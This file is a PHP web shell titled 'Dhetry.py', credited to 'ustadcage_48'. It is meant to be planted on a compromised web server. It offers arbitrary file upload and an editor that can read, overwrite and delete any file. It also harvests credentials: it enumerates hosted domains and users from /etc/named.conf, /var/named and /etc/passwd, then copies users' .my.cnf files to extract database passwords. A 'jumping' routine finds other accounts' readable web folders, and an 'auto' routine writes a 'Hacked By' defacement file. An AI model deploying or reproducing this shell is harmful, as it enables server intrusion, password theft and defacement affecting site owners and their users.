dhetry.py

<?php
// creator ustadcage_48
error_reporting(0);
?>

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN"
"http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<link href='http://fonts.googleapis.com/css?family=Offside' rel='stylesheet' type='text/css'/>
<title>#Shell Priv48 Dhetry.py</title>
<style>
a {
text-decoration: none;
color: gold;
}
body {
background: #282828;
font-family: Offside;
font-size: 15px;
color: #ffffff;
margin: 0px auto;
max-width:600px;
}
input[type=text] { border-radius:0; border:0; color: #ffffff; background-color: #606060; height:21px; width:72%; font-family: Offside; }
input[type=file] { border-radius:0; border:0; color: #ffffff; background-color: #606060; height:auto; padding:5px; width:72%; font-family: Offside; }
input[type=submit] { font-family: Offside; border-radius: 0; border: 0; color: #ffffff; background-color: #cc0000; height:36px; width:20%; }
input[type=text], input[type=file], input[type=submit] {
padding: 4px;
margin-bottom: 5px;
margin-top: 5px;
font-family: Offside;
-moz-border-radius: 9px;-webkit-border-radius:9px;border-radius:9px;border:1px solid #fff;
}
.info{color:#000000;padding:7px;display:block;text-align:center;margin:4px;background:#FAFAD2;border:1px solid #DAA520}
.menu {
background-color: #303030; border-bottom: 1px solid #282828; margin:5px; padding:6px; text-align:center; color: #f6f6f6;
-moz-border-radius: 9px;-webkit-border-radius:9px;border-radius:9px;border:1px solid #fff;
}
.list{ background-color: #303030; border-bottom: 1px solid #282828; margin-bottom:2px; padding:6px; text-align:justify; color: #f6f6f6; }
.foot {background:#8B0000;padding:7px;color:#ffffff;text-align:center;}
.crum {background:#cc0000;padding:7px;color:#ffffff;text-align:left;}
textarea { border-radius:0; border:0; color: #ffffff; background-color: #606060; height:300px; padding:5px; width:72%; font-family: Offside; }
</style>
<?php
if($_GET['path']){
    $path = $_GET['path'];
} else {
    $path = getcwd();
}
echo "<center><div class='crum'><center>xXx DHETRY.PY xXx</center></div><div class='info'>";
echo php_uname()."</div>";
echo "<div class='crum'><center>[ <a href='?jumping&path=$path'>JUMPING</a> ] [ <a href='?cpanel&path=$path'>CPANEL</a> ] [ <a href='?auto_upl&path=$path'>AUTO</a> ]</center></div>";
echo "<div class='menu'>";
if(is_dir($path)){
$write = "<font color='green'>Writable</font>";
?>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file" /><br>
<input type="text" name="ufile" placeholder="jkt48.php" /><br>
Permisions : [ <?=$write;?> ]<br>
<input name="upload" type="submit" value="Upload" /> <input type="submit" value="Reset" /> </form>

<?php
if(isset($_REQUEST['ufile'])){
$ufile = $_POST['ufile'];
}
if(isset($_REQUEST['upload'])){
if($_POST['upload']){
if(@copy($_FILES['file']['tmp_name'],$path.'/'.$ufile)){
    $size  = filesize($ufile);
    echo '<script>alert("#Dhetry.py\n\t [+] Name : '.$ufile.'\n\t [+] Size : '.$size.' Bytes\n\t [+] Status : Suksess !!\n\t [+] Path : '.$path.'/'.$ufile.'")</script>';
    echo "<font color='green'>#Sucess</font> : <a href='#'>$ufile</a>";
} else {
$size  = filesize($ufile);
    echo '<script>alert("#Dhetry.py\n\t [+] Name : '.$ufile.'\n\t [+] Size : '.$size.' Bytes\n\t [+] Status : Gagall !!!\n\t [+] Path : '.$path.'/'.$ufile.' ")</script>';
    echo "<font color='red'>#Gagal</font> : <a href='#'>$ufile</a>";
}}}} else {
    echo "#Uploader : [ <font color='red'>Not Writable</font> ]";
}
echo "</menu></center>";
/* Cpanel automatic */
if(isset($_GET['cpanel'])){
@ini_set('display_errors',0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
  return trim($ar1[0]);
}
$d0mains = @file('/etc/named.conf');
$domains = scandir("/var/named");
if ($domains or $d0mains)
{
$domains = scandir("/var/named");
if($domains) {
$count=1;
$dc = 0;
$list = scandir("/var/named");
foreach($list as $domain){
if(strpos($domain,".db")){
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
$dirz = '/home/'.$owner['name'].'/.my.cnf';
$path = getcwd();
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
$password=entre2v2($p,'password="','"');
$dc++;
}}}
$total = $dc;
echo "<script>alert('Cpanel : ".$total." Cracked !');</script>";
}else{
$d0mains = @file('/etc/named.conf');
if($d0mains) {
$count=1;
$dc = 0;
$mck = array();
foreach($d0mains as $d0main){
if(@eregi('zone',$d0main)){
preg_match_all('#zone "(.*)"#',$d0main,$domain);
flush();
if(strlen(trim($domain[1][0])) >2){
$mck[] = $domain[1][0];
}}}
$mck = array_unique($mck);
$usr = array();
$dmn = array();
foreach($mck as $o) {
$infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
$usr[] = $infos['name'];
$dmn[] = $o;
}
array_multisort($usr,$dmn);
$dt = file('/etc/passwd');
$passwd = array();
foreach($dt as $d) {
$r = explode(':',$d);
if(strpos($r[5],'home')) {
$passwd[$r[0]] = $r[5];
}}
$l=0;
$j=1;
foreach($usr as $r) {
$dirz = '/home/'.$r.'/.my.cnf';
$path = getcwd();
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$r.'.txt');
$p=file_get_contents(''.$path.'/'.$r.'.txt');
$password=entre2v2($p,'password="','"');
$dc++;
flush();
$l=$l?0:1;
$j++;
}}}
$total = $dc;
echo "<script>alert('Cpanel : ".$total." Cracked !');</script>";
}
}else{
echo '<script>alert("#Dhetry.py\n\t [+] Crack : 0 !!\n\t [+] Status Error !");</script>';
}
}
if(isset($_GET['jumping'])){
set_time_limit(0);
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die(''); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd)){
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{           array_push($users,$username);
array_push($pub,$dirz);
}}}
$i++;
}
echo "<script>alert('Jumping = ".sizeof($users)." User !');</script>";
}
if(isset($_GET['auto_upl'])){
$fp = fopen($path.'/'.'x.txt','w'); if(fwrite($fp,'Hacked By UstadCage_48 ~')){
echo '<script>alert("[+] Sukses!");</script>';
}else{
echo '<script>alert("[+] Gagal!");</script>';
}
fclose($fp);
}
$dir = str_replace('\\','/',$path);
$paths = explode('/',$dir);
echo "<div class='crum'>";
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a style="color:#fff" href="?path=/">/</a> ';
continue;
}
if($pat == '') continue;
echo '<a style="color:orange" href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a> > ';
}
echo "</div>";
//

if(isset($_GET['view'])){
$fp = fopen($_POST['get'],'w');
if($_POST['proses']){ if(fwrite($fp,$_POST['isi'])){
echo '<script>alert("Sukses!");</script>';
}else{
echo '<script>alert("Gagal!");</script>';
}
fclose($fp);
}
echo "<br><center>
[ <a href='?delete&get=".$_GET['get']."&path=$path'>Delete</a> ] [ <a href=''>Rename</a> ]<br><br>
<form action='' method='POST'><textarea name='isi'>".htmlspecialchars(file_get_contents($_GET['get']))."</textarea>
<input type='text' name='get' value='".$_GET['get']."'><br><input type='submit' value='Edit' name='proses'></form></center><br>";

} else {
$files = scandir ($path);
$direct = 0;
foreach ($files as $out) {
if(!is_dir("$path/$out") || $out == '.' || $out == '..') continue;
echo "<div class=\"list\">&hearts; <a href=\"?path=$path/$out\">" . $out ."</a></div>";
}
///// SCAN FILE
if(is_dir($path)){
foreach ($files as $out) {
if(!is_file("$path/$out") || $out == '.' || $out == '..') continue;
echo "<div class=\"list\"> &hearts; <a href=\"?view&path=$path&get=$path/$out&filename=".$out."\"><acronym title=\"loll\">".$out."</acronym></a></div>";
}
} else {
echo "<div class='menu'><center>#Directory : [ <font color='red'>Not Writable</font> ]</center></div>"; }
}
?>
<div class='crum'><center>&copy; 2016 Dhetry.py</center></div>
<div class='foot'><center>AllRight Reserved</center></div>
</html>